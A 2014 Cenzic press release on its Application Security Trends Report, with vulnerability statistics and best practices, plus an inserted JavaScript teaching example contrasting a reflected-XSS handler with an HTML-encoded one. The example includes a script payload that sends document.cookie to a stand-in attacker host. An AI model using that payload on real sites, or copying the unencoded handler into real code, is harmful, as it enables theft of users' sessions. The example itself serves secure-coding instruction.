Cenzic Releases 2014 Application Security Trends Report

Annual Study Finds That Ninety-Six Percent of Tested Applications Have Security Vulnerabilities

Feb 19, 2014, 09:00 ET from Cenzic

CAMPBELL, Calif., Feb. 19, 2014 /PRNewswire/ -- Cenzic, the leading provider of application security intelligence to reduce security risks, today released a new report showing that nearly all applications it tested contain security vulnerabilities that expose them to attack. The Cenzic Application Security Trends Report 2014 found security flaws in 96 percent of tested applications, a figure that remains alarmingly high.

The report, based on data gathered by the Cenzic Managed Security team during its analysis of applications in production, shows that improvements in patch deployment and secure coding practices have made a slight dent in the incidence of vulnerabilities. However, the emergence of BYOD, cloud services and mobile applications, together with the continued failure of organizations to detect and address weaknesses in information leakage, authentication and authorization, and session management, keeps vulnerabilities nearly ubiquitous. In fact, the median number of vulnerabilities per application rose to 14, up from 13 in the previous year.

"In the three years that we have compiled this study, the frequency of application vulnerabilities discovered has remained consistently, astoundingly high," said Bala Venkat, Chief Marketing Officer (CMO) at Cenzic. "While some improvements in the development process have been made, other newer areas of vulnerability have emerged. It's a graphic illustration of the gigantic game of whack-a-mole that enterprises and software developers are playing – and a clear message that it's time to rethink the way we develop and test our applications."

The Cenzic Application Security Trends Report 2014 revealed a wide range of findings regarding application vulnerabilities including:

  • Steady growth in the incidence of security flaws in mobile applications. The report found that privacy violations and excessive privileges appear in over 80 percent of mobile applications.
  • Increasing incidence of vulnerabilities in applications shared with third parties. Cloud service providers and supply-chain partners, which may be outside the organization's sphere of control, are a major source of risk today.
  • Information leakage remains widespread. Around 23 percent of vulnerabilities were related to information leakage, in which an application inappropriately discloses sensitive data, such as technical details of the application (stack traces, version strings, internal paths) or user-specific data.
  • The age-old problem of Cross-Site Scripting (XSS) is still to blame. Some 25 percent of vulnerabilities were related to cross-site scripting (XSS), in which an application reflects attacker-supplied input into a page without encoding it, so that a script delivered through an otherwise trusted URL on the site's own domain executes in the victim's browser.
  • Other classes of flaws cannot be ignored. Flaws in authentication or authorization made up 15 percent of vulnerabilities, and session management errors accounted for 13 percent.

"While old standbys such as XSS and SQL injection may be coming under better control, emerging classes of vulnerabilities – such as information leakage, which is common in mobile applications – are growing," added Venkat. "The growth of emerging technologies and new application categories – such as cloud and mobile apps – increases the complexity of the security effort."

Many of today's vulnerabilities – even those that are relatively new – are preventable. Cenzic has outlined some key best practices to remind enterprises of some simple solutions that can help secure their applications:

  • Implement Safe Coding Practices. These are the techniques application developers use to keep vulnerabilities out of the code in the first place, such as validating input and encoding output for the context in which it is rendered. Consistent, high-quality coding practice is the most effective deterrent to attack because it removes the flaw rather than masking it.
  • Use Web Application Firewalls (WAFs). WAFs enable policy-based blocking of attack traffic aimed at specific vulnerabilities known to exist in an application, without rewriting application code. They are particularly effective for rapidly blocking a vulnerability found in a production application while the fix is being developed, without requiring a full re-release of the application. A WAF is a compensating control, though: the underlying flaw remains until the code is fixed, and a rule written too narrowly for one payload can be bypassed by a variant.
  • Ensure Proper Server Configurations. This covers the practices for managing the server hardware, operating systems and security certificates on the devices that run a particular application, so that a securely written application is not undermined by the platform beneath it.
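The two points above meet in the report's most common finding, reflected XSS. The following is an added example, not code from Cenzic or from the report: a search handler that echoes a query parameter into HTML (the "trusted URL" attack described earlier) next to its hardened form, which applies the output encoding a safe-coding practice calls for. The handler and the hostname attacker.example are hypothetical, and the payload is constructed for the demonstration.

```javascript
// Added example (not Cenzic's code): a reflected XSS sink and its hardened form.
// The vulnerable handler interpolates the query parameter straight into HTML;
// the hardened one HTML-encodes it first. Both are plain functions so the
// behaviour can be checked without starting a server.

// Minimal HTML entity encoding for text placed in element content or a
// double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: a search page that echoes the "q" parameter back into the page.
// A link such as /search?q=<script>...</script> on the site's own (trusted)
// host delivers the attacker's script to any victim who follows it.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: same page, but the untrusted value is encoded for the HTML
// context it lands in, so the browser treats it as text rather than markup.
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Crude check used only for the demonstration: does the rendered page
// contain a <script> tag that the template itself never emits?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker payload, as it would look after "q" is URL-decoded.
// The hostname is hypothetical.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Render the same payload through both handlers and report the outcome.
function demo() {
  const vulnerable = renderSearchVulnerable(PAYLOAD);
  const hardened = renderSearchHardened(PAYLOAD);
  return {
    vulnerableInjected: containsInjectedScript(vulnerable), // true
    hardenedInjected: containsInjectedScript(hardened),     // false
    hardened,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The encoding in escapeHtml is only correct for element content and quoted attribute values; a value placed inside a script block, a URL, or a CSS rule needs the encoder for that context, which is why the practice is "encode output for the context" rather than one universal escape function.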

"One of the chief obstacles that remains is to get software developers and enterprises to stop thinking of vulnerability scanning as a one-time project," Venkat stated. "As web applications evolve and make their journey traversing various production environments, the incidence of vulnerabilities is growing, not shrinking. Application development and security teams must get together and implement a plan for continuous proactive monitoring of vulnerabilities, rather than the traditional, annual quality assessment."

The Cenzic Application Security Trends Report 2014 is available here. Cenzic will also be attending RSA 2014 in San Francisco and is available to discuss the findings there.

About Cenzic, Inc.
Cenzic provides the leading application security intelligence platform to continuously assess Cloud, Mobile and Web applications to reduce online security risk. Cenzic's solutions scale from single applications to enterprise-level deployments with hybrid approaches that enable testing of applications at optimal levels. Cenzic helps brands of all sizes protect their reputation and manage security risk in the face of malicious attacks. Cenzic's solutions are used in all parts of the software development lifecycle, and most importantly in production, to protect against new threats even after the application has been deployed. Cenzic's application security intelligence platform is architected to handle web, cloud and mobile applications and is the first to provide risk reduction recommendations for business, application developers and specific applications. Today, Cenzic secures more than half a million online applications and trillions of dollars of commerce for Fortune 1000 companies, all major security companies, government agencies, universities and SMBs.